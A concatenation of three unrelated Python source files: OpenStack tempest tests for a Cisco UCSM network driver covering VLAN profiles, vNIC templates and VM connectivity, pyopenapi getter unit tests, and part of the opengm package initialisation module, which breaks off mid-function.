self.timed_assert(self.assertNotEmpty,
lambda: self.ucsm.get_vlan_profile(vlan_id))
# Verify vlan has been added to a compute where instance is launched
port = self.admin_ports_client.show_port(port_obj['id'])['port']
binding_host_id = port['binding:host_id']
for eth_name in self.eth_names:
self.timed_assert(
self.assertNotEmpty,
lambda: self.ucsm.get_ether_vlan(
self.compute_host_dict[binding_host_id], eth_name, vlan_id))
floating_ip = self.create_floating_ip(server)
self.check_public_network_connectivity(server, floating_ip)
@test.attr(type='non-sriov')
def test_non_sriov_intra_vm_to_vm(self):
"""Covered test cases:
* Intra VM to VM connectivity
"""
self._verify_single_ucsm_configured()
self._verify_connectivity_tests_enabled()
master_host = random.choice(self.compute_host_dict.keys())
network_obj, subnet_obj, router_obj = self.create_networks()
kwargs = {'security_groups': [self.security_group['id']]}
# Create server #1
port_obj1 = self._create_port(network_obj['id'], **kwargs)
server1 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj1['id'],
availability_zone='nova:' + master_host)
# Create server #2 on the same compute
port_obj2 = self._create_port(network_obj['id'], **kwargs)
server2 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj2['id'],
availability_zone='nova:' + master_host)
self.assert_vm_to_vm_connectivity(server1, server2)
@test.attr(type='non-sriov')
def test_non_sriov_inter_vm_to_vm(self):
"""Covered test cases:
* Inter VM to VM connectivity
"""
self._verify_single_ucsm_configured()
self._verify_connectivity_tests_enabled()
self._verify_more_than_one_compute_host_exist()
if len(self.compute_host_dict.keys()) < 2:
raise self.skipException('Not enough amount of compute hosts. Need at least 2. '
'Update tempest.conf')
master_host, slave_host = random.sample(self.compute_host_dict.keys(), 2)
network_obj, subnet_obj, router_obj = self.create_networks()
kwargs = {'security_groups': [self.security_group['id']]}
# Create server #1
port_obj1 = self._create_port(network_obj['id'], **kwargs)
server1 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj1['id'],
availability_zone='nova:' + master_host)
# Create server #2 on another compute
port_obj2 = self._create_port(network_obj['id'], **kwargs)
server2 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj2['id'],
availability_zone='nova:' + slave_host)
self.assert_vm_to_vm_connectivity(server1, server2)
@test.attr(type='non-sriov')
def test_non_sriov_delete_second_instance(self):
"""Covered test cases:
* The driver does not delete vlan if there is at
least one instance on a host
"""
self._verify_single_ucsm_configured()
self._verify_connectivity_tests_enabled()
master_host = random.choice(self.compute_host_dict.keys())
network_obj, subnet_obj, router_obj = self.create_networks()
kwargs = {'security_groups': [self.security_group['id']]}
# Create server #1
port_obj1 = self._create_port(network_obj['id'], **kwargs)
server1 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj1['id'],
availability_zone='nova:' + master_host)
# Create server #2 on the same host
port_obj2 = self._create_port(network_obj['id'], **kwargs)
server2 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj2['id'],
availability_zone='nova:' + master_host)
# Verify vlan profile has been created
network = self.admin_networks_client.show_network(
network_obj['id'])['network']
vlan_id = network['provider:segmentation_id']
self.timed_assert(self.assertNotEmpty,
lambda: self.ucsm.get_vlan_profile(vlan_id))
# Verify vlan has been added to a host where instance is launched
for eth_name in self.eth_names:
self.timed_assert(
self.assertNotEmpty,
lambda: self.ucsm.get_ether_vlan(
self.compute_host_dict[master_host], eth_name, vlan_id))
self.servers_client.delete_server(server2['id'])
waiters.wait_for_server_termination(self.servers_client, server2['id'])
self.ports_client.delete_port(port_obj2['id'])
# Sleep some time to let neutron process all events.
time.sleep(20)
# Verify vlan profile has been created
network = self.admin_networks_client.show_network(
network_obj['id'])['network']
vlan_id = network['provider:segmentation_id']
self.timed_assert(self.assertNotEmpty,
lambda: self.ucsm.get_vlan_profile(vlan_id))
# Verify vlan has been added to a host where instance is launched
for eth_name in self.eth_names:
self.timed_assert(
self.assertNotEmpty,
lambda: self.ucsm.get_ether_vlan(
self.compute_host_dict[master_host], eth_name, vlan_id))
floating_ip1 = self.create_floating_ip(server1)
self.check_public_network_connectivity(server1, floating_ip1)
@test.attr(type=['non-sriov', 'multi-ucsm'])
def test_multi_create_delete_network(self):
"""Covered test cases:
* The driver creates vlan profile in a certain UCSM
"""
self._verify_multi_ucsm_configured()
# UCSMs to which controllers are connected
ucsm_clients = list()
for conf in self.multi_ucsm_conf.values():
if conf.controller_host_dict:
ucsm_clients.append(self.multi_ucsm_clients[conf['ucsm_ip']])
# Create network and subnet (DHCP enabled)
network = self._create_network()
self.assertEqual('ACTIVE', network['status'])
self._create_subnet(network)
port = self._create_port(
network['id'], security_groups=[self.security_group['id']])
# Get a vlan id and verify a vlan profile has been created
network = self.admin_networks_client.show_network(network['id'])['network']
vlan_id = network['provider:segmentation_id']
for ucsm_client in ucsm_clients:
self.timed_assert(self.assertNotEmpty, lambda: ucsm_client.get_vlan_profile(vlan_id))
# # Verify vlan has been added to both vnics
# for ucsm_client in ucsm_clients:
# conf = self.multi_ucsm_conf[ucsm_client.ip]
# for controller_sp in conf['controller_host_dict'].values():
# for eth_name in conf['eth_names']:
# self.timed_assert(
# self.assertNotEmpty,
# lambda: self.ucsm.get_ether_vlan(controller_sp, eth_name, vlan_id))
# Delete network and verify that the vlan profile has been removed
self.ports_client.delete_port(port['id'])
self._delete_network(network)
for ucsm_client in ucsm_clients:
self.timed_assert(self.assertEmpty,
lambda: ucsm_client.get_vlan_profile(vlan_id))
# # Verify the vlan has been removed from both vnics
# for ucsm_client in ucsm_clients:
# conf = self.multi_ucsm_conf[ucsm_client.ip]
# for controller_sp in conf['controller_host_dict'].values():
# for eth_name in conf['eth_names']:
# self.timed_assert(
# self.assertEmpty,
# lambda: self.ucsm.get_ether_vlan(controller_sp, eth_name, vlan_id))
@test.attr(type=['non-sriov', 'multi-ucsm', 'service-profile-templates'])
def test_multi_desired_ucsm_vnics_configured(self):
"""Covered test cases:
Multi-UCSM
* The driver creates vlan profile in a certain UCSM
* The driver adds vlan profile to vNIC of a service profile located in a certain UCSM
* The driver deletes vlan profile to vNIC of a service profile located in a certain UCSM
* Right vNICs are configured in a certain UCSM
Service Profile templates
* UCSM driver adds vlans to a vNIC of Service Profile template
* UCSM driver deletes vlans from vNIC of a Service Profile template
* VLAN profile is deleted once network is removed
"""
self._verify_multi_ucsm_configured()
self._verify_connectivity_tests_enabled()
network_obj, subnet_obj, router_obj = self.create_networks()
kwargs = {'security_groups': [self.security_group['id']]}
port_obj = self._create_port(network_obj['id'], **kwargs)
random_ucsm = random.choice(self.multi_ucsm_conf.values())
random_ucsm_client = self.multi_ucsm_clients[random_ucsm['ucsm_ip']]
random_compute = random.choice(random_ucsm['compute_host_dict'].keys())
random_compute_sp = random_ucsm['compute_host_dict'][random_compute]
server = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj['id'],
availability_zone='nova:' + random_compute)
# Verify vlan profile has been created
network = self.admin_networks_client.show_network(
network_obj['id'])['network']
vlan_id = network['provider:segmentation_id']
self.timed_assert(self.assertNotEmpty,
lambda: random_ucsm_client.get_vlan_profile(vlan_id))
# Verify vlan has been added to a compute where instance is launched
port = self.admin_ports_client.show_port(port_obj['id'])['port']
binding_host_id = port['binding:host_id']
self.assertEqual(random_compute, binding_host_id, 'binding:host_id same as we want')
for eth_name in random_ucsm['eth_names']:
self.timed_assert(
self.assertNotEmpty,
lambda: random_ucsm_client.get_ether_vlan(random_compute_sp, eth_name, vlan_id))
self.servers_client.delete_server(server['id'])
waiters.wait_for_server_termination(self.servers_client, server['id'])
self.ports_client.delete_port(port_obj['id'])
self.subnets_client.delete_subnet(subnet_obj['id'])
network_obj.delete()
self.timed_assert(self.assertEmpty,
lambda: random_ucsm_client.get_vlan_profile(vlan_id))
for eth_name in random_ucsm['eth_names']:
self.timed_assert(
self.assertEmpty,
lambda: random_ucsm_client.get_ether_vlan(random_compute_sp, eth_name, vlan_id))
@test.attr(type=['non-sriov', 'multi-ucsm', 'service-profile-templates'])
def test_multi_inter_vm_to_vm_computes_attached_to_same_fi(self):
"""Covered test cases:
Multi-UCSM
* Inter VM to VM connectivity
Service Profile templates
* Inter VM to VM connectivity. Computes attached to the same UCSM
* Instance is able to get IP address from DHCP service
* VLAN profile is not deleted if it used by at least one Service Profile template
* Right vNICs are configured in a certain UCSM
"""
self._verify_multi_ucsm_configured(need_amount=1)
self._verify_connectivity_tests_enabled()
self._verify_more_than_one_compute_host_exist()
ucsm_conf1 = random.choice(self.multi_ucsm_conf.values())
ucsm_client1 = self.multi_ucsm_clients[ucsm_conf1['ucsm_ip']]
compute1, compute2 = random.sample(ucsm_conf1['compute_host_dict'].keys(), 2)
network_obj, subnet_obj, router_obj = self.create_networks()
kwargs = {'security_groups': [self.security_group['id']]}
# Create server #1
port_obj1 = self._create_port(network_obj['id'], **kwargs)
server1 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj1['id'],
availability_zone='nova:' + compute1)
# Create server #2 on another compute
port_obj2 = self._create_port(network_obj['id'], **kwargs)
server2 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj2['id'],
availability_zone='nova:' + compute2)
self.assert_vm_to_vm_connectivity(server1, server2)
# Delete one server and verify VLAN profile still exists
self.servers_client.delete_server(server1['id'])
waiters.wait_for_server_termination(self.servers_client, server1['id'])
self.ports_client.delete_port(port_obj1['id'])
network = self.admin_networks_client.show_network(
network_obj['id'])['network']
vlan_id = network['provider:segmentation_id']
self.timed_assert(self.assertNotEmpty,
lambda: ucsm_client1.get_vlan_profile(vlan_id))
# Delete another server, ports, subnet, network.
# Verify VLAN is removed
self.servers_client.delete_server(server2['id'])
waiters.wait_for_server_termination(self.servers_client, server2['id'])
self.ports_client.delete_port(port_obj2['id'])
self.subnets_client.delete_subnet(subnet_obj['id'])
network_obj.delete()
self.timed_assert(self.assertEmpty,
lambda: ucsm_client1.get_vlan_profile(vlan_id))
for compute in (compute1, compute2):
for eth_name in ucsm_conf1['eth_names']:
compute_sp = ucsm_conf1['compute_host_dict'][compute]
self.timed_assert(
self.assertEmpty,
lambda: ucsm_client1.get_ether_vlan(compute_sp, eth_name, vlan_id))
@test.attr(type=['non-sriov', 'multi-ucsm', 'service-profile-templates'])
def test_multi_inter_vm_to_vm_computes_attached_to_different_fi(self):
"""Covered test cases:
Multi-UCSM
* Inter VM to VM connectivity
Service Profile templates
* Inter VM to VM connectivity. Computes attached to different UCSMs
* Instance is able to get IP address from DHCP service
* VLAN profile is not deleted if it used by at least one Service Profile template
* Right vNICs are configured in a certain UCSM
"""
self._verify_multi_ucsm_configured(need_amount=2)
self._verify_connectivity_tests_enabled()
self._verify_more_than_one_compute_host_exist()
ucsm_conf1, ucsm_conf2 = random.sample(self.multi_ucsm_conf.values(), 2)
ucsm_client1 = self.multi_ucsm_clients[ucsm_conf1['ucsm_ip']]
ucsm_client2 = self.multi_ucsm_clients[ucsm_conf2['ucsm_ip']]
compute1 = random.choice(ucsm_conf1['compute_host_dict'].keys())
compute2 = random.choice(ucsm_conf2['compute_host_dict'].keys())
network_obj, subnet_obj, router_obj = self.create_networks()
kwargs = {'security_groups': [self.security_group['id']]}
# Create server #1
port_obj1 = self._create_port(network_obj['id'], **kwargs)
server1 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj1['id'],
availability_zone='nova:' + compute1)
# Create server #2 on another compute
port_obj2 = self._create_port(network_obj['id'], **kwargs)
server2 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj2['id'],
availability_zone='nova:' + compute2)
self.assert_vm_to_vm_connectivity(server1, server2)
# Delete one server and verify VLAN profile still exists
self.servers_client.delete_server(server1['id'])
waiters.wait_for_server_termination(self.servers_client, server1['id'])
self.ports_client.delete_port(port_obj1['id'])
network = self.admin_networks_client.show_network(
network_obj['id'])['network']
vlan_id = network['provider:segmentation_id']
self.timed_assert(self.assertNotEmpty,
lambda: ucsm_client1.get_vlan_profile(vlan_id))
self.timed_assert(self.assertNotEmpty,
lambda: ucsm_client2.get_vlan_profile(vlan_id))
# Delete another server, ports, subnet, network.
# Verify VLAN is removed
self.servers_client.delete_server(server2['id'])
waiters.wait_for_server_termination(self.servers_client, server2['id'])
self.ports_client.delete_port(port_obj2['id'])
self.subnets_client.delete_subnet(subnet_obj['id'])
network_obj.delete()
self.timed_assert(self.assertEmpty,
lambda: ucsm_client1.get_vlan_profile(vlan_id))
self.timed_assert(self.assertEmpty,
lambda: ucsm_client2.get_vlan_profile(vlan_id))
for conf, cl, cp in ((ucsm_conf1, ucsm_client1, compute1), (ucsm_conf2, ucsm_client2, compute2)):
for eth_name in conf['eth_names']:
compute_sp = conf['compute_host_dict'][cp]
self.timed_assert(
self.assertEmpty,
lambda: cl.get_ether_vlan(compute_sp, eth_name, vlan_id))
@test.attr(type=['non-sriov', 'multi-ucsm', 'service-profile-templates'])
def test_multi_intra_vm_to_vm(self):
"""Covered test cases:
Service Profile templates
* Intra VM to VM connectivity
* Instance is able to get IP address from DHCP service
* VLAN is not deleted from a service profile template if it used by at least one neutron port on a compute host
"""
self._verify_multi_ucsm_configured()
self._verify_connectivity_tests_enabled()
ucsm_conf1 = random.choice(self.multi_ucsm_conf.values())
ucsm_client1 = self.multi_ucsm_clients[ucsm_conf1['ucsm_ip']]
compute1 = random.choice(ucsm_conf1['compute_host_dict'].keys())
network_obj, subnet_obj, router_obj = self.create_networks()
kwargs = {'security_groups': [self.security_group['id']]}
# Create server #1
port_obj1 = self._create_port(network_obj['id'], **kwargs)
server1 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj1['id'],
availability_zone='nova:' + compute1)
# Create server #2 on another compute
port_obj2 = self._create_port(network_obj['id'], **kwargs)
server2 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj2['id'],
availability_zone='nova:' + compute1)
self.assert_vm_to_vm_connectivity(server1, server2)
# Delete one server and verify VLAN profile still exists
self.servers_client.delete_server(server1['id'])
waiters.wait_for_server_termination(self.servers_client, server1['id'])
self.ports_client.delete_port(port_obj1['id'])
network = self.admin_networks_client.show_network(
network_obj['id'])['network']
vlan_id = network['provider:segmentation_id']
self.timed_assert(self.assertNotEmpty,
lambda: ucsm_client1.get_vlan_profile(vlan_id))
# Delete another server, ports, subnet, network.
# Verify VLAN is removed
self.servers_client.delete_server(server2['id'])
waiters.wait_for_server_termination(self.servers_client, server2['id'])
self.ports_client.delete_port(port_obj2['id'])
self.subnets_client.delete_subnet(subnet_obj['id'])
network_obj.delete()
self.timed_assert(self.assertEmpty,
lambda: ucsm_client1.get_vlan_profile(vlan_id))
for eth_name in ucsm_conf1['eth_names']:
compute_sp = ucsm_conf1['compute_host_dict'][compute1]
self.timed_assert(
self.assertEmpty,
lambda: ucsm_client1.get_ether_vlan(compute_sp, eth_name, vlan_id))
@test.attr(type=['non-sriov', 'multi-ucsm', 'vnic-templates'])
def test_multi_vnic_templates_create_delete_network(self):
"""Covered test cases:
* UCSM Diriver adds vlans to a vNIC template
* UCSM Driver deletes vlans from a vNIC template
"""
self._verify_vnic_templates_configured()
random_physnet = random.choice(CONF.ucsm.physnets)
# UCSMs to which computes are connected and vNIC template is associated with "random_physnet"
ucsm_list = list()
for conf in self.ucsm_confs_with_vnic_templates:
if conf.compute_host_dict and random_physnet in conf.vnic_template_dict.keys():
ucsm_list.append(conf)
if len(ucsm_list) == 0:
self.skipException('Computes do not use vNIC templates. Check tempest.conf')
# Create network as an admin user. Only admin user is allowed to set "provider:physical_network"
params = {'provider:network_type': 'vlan',
'provider:physical_network': random_physnet}
network_obj = self._create_network(networks_client=self.admin_networks_client, **params)
self.assertEqual('ACTIVE', network_obj['status'])
# Create subnet (DHCP enabled)
subnet_obj = self._create_subnet(network_obj)
port_obj = self._create_port(
network_obj['id'], security_groups=[self.security_group['id']])
# Choose random UCSM.
random_ucsm = random.choice(ucsm_list)
random_ucsm_client = self.multi_ucsm_clients[random_ucsm['ucsm_ip']]
random_compute = random.choice(random_ucsm['compute_host_dict'].keys())
vnic_template = random_ucsm['vnic_template_dict'][random_physnet]
server = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj['id'],
availability_zone='nova:' + random_compute)
# Get a vlan id and verify a vlan profile has been created
network = self.admin_networks_client.show_network(network_obj['id'])['network']
vlan_id = network['provider:segmentation_id']
self.timed_assert(self.assertNotEmpty,
lambda: random_ucsm_client.get_vlan_profile(vlan_id))
# Verify VLAN is added to vNIC template
self.timed_assert(self.assertNotEmpty, lambda: random_ucsm_client.get_vnic_template_vlan(vnic_template, vlan_id))
# Delete server, port, subnet, network
self.servers_client.delete_server(server['id'])
waiters.wait_for_server_termination(self.servers_client, server['id'])
self.ports_client.delete_port(port_obj['id'])
self.subnets_client.delete_subnet(subnet_obj['id'])
network_obj.delete()
# Verify vlan profile has been removed
self.timed_assert(self.assertEmpty,
lambda: random_ucsm_client.get_vlan_profile(vlan_id))
# Verify VLAN is removed from vNIC template
self.timed_assert(self.assertEmpty, lambda: random_ucsm_client.get_vnic_template_vlan(vnic_template, vlan_id))
@test.attr(type=['non-sriov', 'multi-ucsm', 'vnic-templates'])
def test_multi_vnic_templates_inter_vm_to_vm(self):
"""Covered test cases:
vNIC templates
* Inter VM to VM connectivity
* Instance is able to get IP address from DHCP service
* VLAN profile is not deleted if it used by at least one vNIC Template
"""
self._verify_vnic_templates_configured(need_amount=2)
self._verify_connectivity_tests_enabled()
self._verify_more_than_one_compute_host_exist()
random_physnet = random.choice(CONF.ucsm.physnets)
ucsm_conf1, ucsm_conf2 = random.sample(self.ucsm_confs_with_vnic_templates, 2)
ucsm_client1 = self.multi_ucsm_clients[ucsm_conf1['ucsm_ip']]
ucsm_client2 = self.multi_ucsm_clients[ucsm_conf1['ucsm_ip']]
compute1 = random.choice(ucsm_conf1['compute_host_dict'].keys())
compute2 = random.choice(ucsm_conf2['compute_host_dict'].keys())
network_kwargs = {'provider:network_type': 'vlan',
'provider:physical_network': random_physnet}
network_obj, subnet_obj, router_obj = self.create_networks(
networks_client=self.admin_networks_client, network_kwargs=network_kwargs)
kwargs = {'security_groups': [self.security_group['id']]}
# Create server #1
port_obj1 = self._create_port(network_obj['id'], **kwargs)
server1 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj1['id'],
availability_zone='nova:' + compute1)
# Create server #2 on another compute
port_obj2 = self._create_port(network_obj['id'], **kwargs)
server2 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj2['id'],
availability_zone='nova:' + compute2)
self.assert_vm_to_vm_connectivity(server1, server2)
# Delete one server and verify VLAN profile still exists
self.servers_client.delete_server(server1['id'])
waiters.wait_for_server_termination(self.servers_client, server1['id'])
self.ports_client.delete_port(port_obj1['id'])
network = self.admin_networks_client.show_network(
network_obj['id'])['network']
vlan_id = network['provider:segmentation_id']
self.timed_assert(self.assertEmpty,
lambda: ucsm_client1.get_vlan_profile(vlan_id))
# Verify VLAN is still assigned to vNIC template on another UCSM
vnic_template = ucsm_conf1['vnic_template_dict'][random_physnet]
self.timed_assert(self.assertNotEmpty, lambda: ucsm_client2.get_vnic_template_vlan(vnic_template, vlan_id))
self.timed_assert(self.assertNotEmpty,
lambda: ucsm_client2.get_vlan_profile(vlan_id))
@test.attr(type=['non-sriov', 'multi-ucsm', 'vnic-templates'])
def test_multi_vnic_templates_intra_vm_to_vm(self):
"""Covered test cases:
vNIC templates
* Intra VM to VM connectivity
* Instance is able to get IP address from DHCP service
* VLAN is not deleted from vNIC template if it used by at least one neutron port on a compute host
"""
self._verify_vnic_templates_configured()
self._verify_connectivity_tests_enabled()
random_physnet = random.choice(CONF.ucsm.physnets)
ucsm_conf1 = random.choice(self.ucsm_confs_with_vnic_templates)
ucsm_client1 = self.multi_ucsm_clients[ucsm_conf1['ucsm_ip']]
compute1 = random.choice(ucsm_conf1['compute_host_dict'].keys())
network_kwargs = {'provider:network_type': 'vlan',
'provider:physical_network': random_physnet}
network_obj, subnet_obj, router_obj = self.create_networks(
networks_client=self.admin_networks_client, network_kwargs=network_kwargs)
kwargs = {'security_groups': [self.security_group['id']]}
# Create server #1
port_obj1 = self._create_port(network_obj['id'], **kwargs)
server1 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj1['id'],
availability_zone='nova:' + compute1)
# Create server #2 on another compute
port_obj2 = self._create_port(network_obj['id'], **kwargs)
server2 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj2['id'],
availability_zone='nova:' + compute1)
self.assert_vm_to_vm_connectivity(server1, server2)
# Delete one server and verify VLAN profile still exists
self.servers_client.delete_server(server1['id'])
waiters.wait_for_server_termination(self.servers_client, server1['id'])
self.ports_client.delete_port(port_obj1['id'])
network = self.admin_networks_client.show_network(
network_obj['id'])['network']
vlan_id = network['provider:segmentation_id']
self.timed_assert(self.assertNotEmpty,
lambda: ucsm_client1.get_vlan_profile(vlan_id))
# Verify VLAN is still assigned to vNIC template
vnic_template = ucsm_conf1['vnic_template_dict'][random_physnet]
self.timed_assert(self.assertNotEmpty, lambda: ucsm_client1.get_vnic_template_vlan(vnic_template, vlan_id))
| |
# -*- coding: utf-8 -*-
import unittest
import os
import json
from pyopenapi.migration.getter import UrlGetter, DictGetter, SimpleGetter
from pyopenapi.migration.resolve import Resolver
from pyopenapi.utils import compare_container
from ..utils import get_test_data_folder, SampleApp
class _MyCustomException(Exception):
pass
def _my_custom_load(_):
raise _MyCustomException('a testing exception')
class _MyCustomGetter(SimpleGetter):
__simple_getter_callback__ = _my_custom_load
class GetterTestCase(unittest.TestCase):
""" test getter """
def test_random_name_v2_0(self):
"""
"""
path = get_test_data_folder(version='2.0', which='random_file_name')
path = os.path.join(path, 'test_random.json')
# should not raise ValueError
try:
SampleApp.create(path, to_spec_version='2.0')
except:
self.fail('unable to load random_file_name_v2_0')
raise
def test_random_name_v1_2(self):
"""
"""
path = get_test_data_folder(version='1.2', which='random_file_name')
path = os.path.join(path, 'test_random.json')
# should not raise ValueError
try:
SampleApp.create(path, to_spec_version='2.0')
except:
self.fail('unable to load test_random_name_v1_2')
raise
def test_local_path(self):
""" make sure path would be assigned when
passing a getter class
"""
cls = UrlGetter
path = get_test_data_folder(version='2.0', which='random_file_name')
path = os.path.join(path, 'test_random.json')
# should not raise errors
try:
SampleApp.load(path, getter=cls)
except:
self.fail('unable to load test_random_name_v2_0')
raise
def test_dict_getter_v1_2(self):
""" make sure 'DictGetter' works the same as 'LocalGetter'
for Swagger 1.2
"""
#
# loading via DictGetter
#
path = get_test_data_folder(version='1.2', which='wordnik')
path_resource_list = os.path.join(path, 'resource_list.json')
path_pet = os.path.join(path, 'pet.json')
path_store = os.path.join(path, 'store.json')
path_user = os.path.join(path, 'user.json')
with open(path_resource_list, 'r') as handle:
resource_list = json.loads(handle.read())
with open(path_pet, 'r') as handle:
pet = json.loads(handle.read())
with open(path_store, 'r') as handle:
store = json.loads(handle.read())
with open(path_user, 'r') as handle:
user = json.loads(handle.read())
getter = DictGetter(
[
path_resource_list,
path_pet,
path_user,
path_store,
], {
path_resource_list: resource_list,
path_pet: pet,
path_store: store,
path_user: user,
})
app = SampleApp.create(
path,
resolver=Resolver(default_getter=getter),
to_spec_version='2.0')
app_default = SampleApp.create(path, to_spec_version='2.0')
# make sure it produce the same App in default way
self.assertEqual(
sorted(compare_container(app.root.dump(), app_default.root.dump())),
[])
#
# different path, mocking an url
#
getter = DictGetter(
[
'http://petstore.com',
'http://petstore.com/pet.json',
'http://petstore.com/user.json',
'http://petstore.com/store.json',
], {
'http://petstore.com': resource_list,
'http://petstore.com/pet.json': pet,
'http://petstore.com/store.json': store,
'http://petstore.com/user.json': user
})
app = SampleApp.create(
'http://petstore.com',
resolver=Resolver(default_getter=getter),
to_spec_version='2.0')
# make sure it produce the same App in default way
self.assertEqual(
sorted(
compare_container(
app.root.dump(), app_default.root.dump(),
exclude=['$ref'])), [])
#
# provide empty path
#
getter = DictGetter(
[
'',
'pet.json',
'user.json',
'store.json',
], {
'': resource_list,
'pet.json': pet,
'store.json': store,
'user.json': user
})
app = SampleApp.create(
'http://petstore.com',
resolver=Resolver(default_getter=getter),
to_spec_version='2.0')
# make sure it produce the same App in default way
self.assertEqual(
sorted(
compare_container(
app.root.dump(), app_default.root.dump(),
exclude=['$ref'])), [])
def test_dict_getter_v2_0(self):
""" make sure 'DictGetter' works the same as 'LocalGetter'
for Swagger 2.0
"""
#
# loading via DictGetter
#
path = get_test_data_folder(version='2.0', which='wordnik')
origin_app = SampleApp.create(path, to_spec_version='2.0')
with open(os.path.join(path, 'swagger.json'), 'r') as handle:
spec = json.loads(handle.read())
getter = DictGetter([path], {os.path.join(path, 'swagger.json'): spec})
app = SampleApp.create(
path,
resolver=Resolver(default_getter=getter),
to_spec_version='2.0')
# make sure it produce the same App in default way
self.assertEqual(
sorted(compare_container(app.root.dump(), origin_app.root.dump())),
[])
#
# loading via wrong path, should be ok when all internal $ref are not absoluted
#
getter = DictGetter([''], {'': spec})
app = SampleApp.create(
'',
resolver=Resolver(default_getter=getter),
to_spec_version='2.0',
)
# make sure it produce the same App in default way
self.assertEqual(
sorted(
compare_container(
app.root.dump(), origin_app.root.dump(), exclude=['$ref'])),
[])
#
# faking http path
#
getter = DictGetter(['https://petstore.com'],
{'https://petstore.com': spec})
app = SampleApp.create(
'https://petstore.com',
resolver=Resolver(default_getter=getter),
to_spec_version='2.0')
# make sure it produce the same App in default way
self.assertEqual(
sorted(
compare_container(
app.root.dump(), origin_app.root.dump(), exclude=['$ref'])),
[])
def test_simple_getter_callback(self):
""" make sure __simple_getter_callback__ is called """
path = get_test_data_folder(version='2.0', which='random_file_name')
path = os.path.join(path, 'test_random.json')
# should raise some specific error
self.assertRaises(
_MyCustomException, SampleApp.load, path, getter=_MyCustomGetter)
| |
from _opengmcore import *
from factorSubset import FactorSubset
from gm_injector import _extend_gm_classes
from factor_injector import _extend_factor_classes
from function_injector import _extend_function_type_classes,\
_extend_function_vector_classes,\
isNativeFunctionType,\
isNativeFunctionVectorType
from dtypes import index_type,value_type,label_type
from printing import prettyValueTable
import numpy
configuration=OpengmConfiguration()
LabelVector=IndexVector
def graphicalModel(numberOfLabels,operator='adder',reserveNumFactorsPerVariable=0):
"""
Factory function to construct a graphical model.
Args:
numberOfLabels : number of label sequence (can be a list or a 1d numpy.ndarray)
operator : operator of the graphical model. Can be 'adder' or 'multiplier' (default: 'adder')
Construct a gm with ``\'adder\'`` as operator::
>>> import opengm
>>> gm=opengm.graphicalModel([2,2,2,2,2],operator='adder')
>>> # or just
>>> gm=opengm.graphicalModel([2,2,2,2,2])
Construct a gm with ``\'multiplier\'`` as operator::
gm=opengm.graphicalModel([2,2,2,2,2],operator='multiplier')
"""
if isinstance(numberOfLabels,numpy.ndarray):
numL=numpy.require(numberOfLabels,dtype=label_type)
else:
numL=numberOfLabels
if operator=='adder' :
return adder.GraphicalModel(numL,reserveNumFactorsPerVariable)
elif operator=='multiplier' :
return multiplier.GraphicalModel(numL,reserveNumFactorsPerVariable)
else:
raise NameError('operator must be \'adder\' or \'multiplier\'')
gm = graphicalModel
def movemaker(gm,labels=None):
if gm.operator=='adder':
if labels is None:
return adder.Movemaker(gm)
else:
return adder.Movemaker(gm,labels)
elif gm.operator=='multiplier':
if labels is None:
return multiplier.Movemaker(gm)
else:
return multiplier.Movemaker(gm,labels)
else:
assert false
def shapeWalker(shape):
"""
generator obect to iterate over a multi-dimensional factor / value table
Args:
shape : shape of the factor / value table
Yields:
coordinate as list of integers
Example: ::
>>> import opengm
>>> import numpy
>>> # some graphical model
>>> # -with 2 variables with 2 labels.
>>> # -with 1 2-order functions
>>> # -connected to 1 factor
>>> gm=opengm.gm([2]*2)
>>> f=opengm.PottsFunction(shape=[2,2],valueEqual=0.0,valueNotEqual=1.0)
>>> int(gm.addFactor(gm.addFunction(f),[0,1]))
0
>>> # iterate over all factors of the graphical model
>>> # (= 1 factor in this example)
>>> for factor in gm.factors():
... # iterate over all labelings with a "shape walker"
... for coord in opengm.shapeWalker(f.shape):
... pass
... print "f[%s]=%.1f" %(str(coord),factor[coord])
f[[0, 0]]=0.0
f[[1, 0]]=1.0
f[[0, 1]]=1.0
f[[1, 1]]=0.0
Note :
Only implemented for dimension<=10
"""
dim=len(shape)
c=[int(0)]*dim
if(dim==1):
for c[0] in xrange(shape[0]):
yield c
elif (dim==2):
for x1 in xrange(shape[1]):
for x0 in xrange(shape[0]):
yield [x0,x1]
elif (dim==3):
for x2 in xrange(shape[2]):
for x1 in xrange(shape[1]):
for x0 in xrange(shape[0]):
yield [x0,x1,x2]
elif (dim==4):
for c[3] in xrange(shape[3]):
for c[2] in xrange(shape[2]):
for c[1] in xrange(shape[1]):
for c[0] in xrange(shape[0]):
yield c
elif (dim==5):
for c[4] in xrange(shape[4]):
for c[3] in xrange(shape[3]):
for c[2] in xrange(shape[2]):
for c[1] in xrange(shape[1]):
for c[0] in xrange(shape[0]):
yield c
elif (dim==6):
for c[5] in xrange(shape[5]):
for c[4] in xrange(shape[4]):
for c[3] in xrange(shape[3]):
for c[2] in xrange(shape[2]):
for c[1] in xrange(shape[1]):
for c[0] in xrange(shape[0]):
yield c
elif (dim==7):
for c[6] in xrange(shape[6]):
for c[5] in xrange(shape[5]):
for c[4] in xrange(shape[4]):
for c[3] in xrange(shape[3]):
for c[2] in xrange(shape[2]):
for c[1] in xrange(shape[1]):
for c[0] in xrange(shape[0]):
yield c
elif (dim==8):
for c[7] in xrange(shape[7]):
